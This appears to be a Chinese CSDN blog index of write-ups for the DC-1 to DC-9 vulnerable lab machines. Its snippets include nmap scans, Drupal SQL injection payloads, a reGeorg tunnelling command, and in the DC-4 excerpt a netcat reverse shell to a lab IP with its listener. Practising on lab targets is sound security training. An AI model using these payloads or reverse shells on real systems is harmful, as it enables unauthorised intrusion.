![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
DC-1-9通关秘籍
火中的冰~
喜欢网络安全,热爱技术的一个小帅哥。
展开
-
入侵靶机DC-9
1.主机发现Nmap -sP 192.168.43.0/24C:\Users\ASUS>Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.79Host is up (0.0010s latency).MAC Address: 00:0C:29:B7:B6:AD (VMware).原创 2020-11-11 22:16:09 · 500 阅读 · 0 评论 -
drupla SQL手工注入复习
判断列数?nid=1 order by 1 --+` ?nid=1 order by 1 --+ 错误程序中SQL语句有两列判断显示位?nid=0 union select 1`数据库名字?nid=0 union select database()数据库版本?nid=0 union select version()列表名?nid=0 union select table_name from information_schema.原创 2020-10-15 20:33:38 · 145 阅读 · 0 评论 -
入侵靶机DC-8
DC-81.主机发现使用Nmap进行ping扫描,根据已知mac地址获取ip地址。Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.1Host is up (0.0049s latency).MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi原创 2020-10-15 20:20:56 · 2008 阅读 · 0 评论 -
入侵靶机DC-7
DC-71.主机发现靶机开机后DHCP获取有ip地址2.信息收集端口扫描C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±??Nmap scan report for dc-7 (192.168.43.111)Host is up (0.00030s latency).Not s原创 2020-10-08 21:52:17 · 1446 阅读 · 0 评论 -
入侵靶机DC-6
DC-61.主机发现2.端口扫描C:\Users\ASUS>Nmap 192.168.43.182 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 10:16 ?D1ú±ê×?ê±??Nmap scan report for dc-6 (192.168.43.182)Host is up (0.00022s latency).Not shown: 65533 closed p原创 2020-10-05 21:40:03 · 1285 阅读 · 0 评论 -
入侵靶机DC-5
1.主机扫描通过已知MAC地址,确定DC-5的ip。2.端口扫描确定靶机开放端口3.访问web界面提交表单发现时间在变化直接访问thankyou.php文件这里可能存在文件包含4.web目录扫描...原创 2020-10-04 19:16:49 · 375 阅读 · 0 评论 -
内网渗透 局域网后渗透
网络环境实验前提1.外网win7上传一句话菜刀连接20082.上传3.kali配置隧道端口sudo vim /etc/proxychains.conf./reGeorgSocksProxy.py -u "http://10.1.1.1/tunnel.nosocket.php" -p 1111proxychains msfconsole原创 2020-08-18 21:47:13 · 889 阅读 · 0 评论 -
入侵靶机DC-4
1.主机扫描2.端口扫描3.测试访问web服务器页面4.尝试爆破web登录界面cd /usr/share/john/cp password.ist ~/Desktop5.抓取命令包7.执行命令反弹shellnc+10.3.139.75+666+-e+/bin/bashlssudo nc -lvvp 666python -c ‘import pty;pty.spawn("/bin/sh")’8.查看用户9.根据提示.原创 2020-08-16 14:45:44 · 157 阅读 · 0 评论 -
入侵靶机DC-1
1.主机发现namp -sP 10.3.139.0/242.指纹收集whatweb 10.3.139.963.目录爆破4.根据版本查询相应漏洞根据版本可查出Drupa7.x存在远程代码执行漏洞5.使用msf进行漏洞利用DC-1一共有5个flagflag3需要登录数据库查找python -c 'import pty;pty.spawn("/bin/bash")'...原创 2020-08-13 19:31:08 · 354 阅读 · 0 评论 -
靶机入侵 DC-3
靶机入侵 DC3渗透环境kali LinuxDC-3 桥接同一网段1.根据靶机mac地址寻找ipKALI 自带的ARP侦查工具扫描netdiscove 2.nmap查看开放放口nmap -O 10.3.139.67 -p-3.使用whatweb对网站进行指纹识别whatweb http://10.3.139.67查询到网站的CMS4.joomscan 进行漏扫joomscan --url http://10.3.139.67...原创 2020-07-26 11:38:43 · 333 阅读 · 0 评论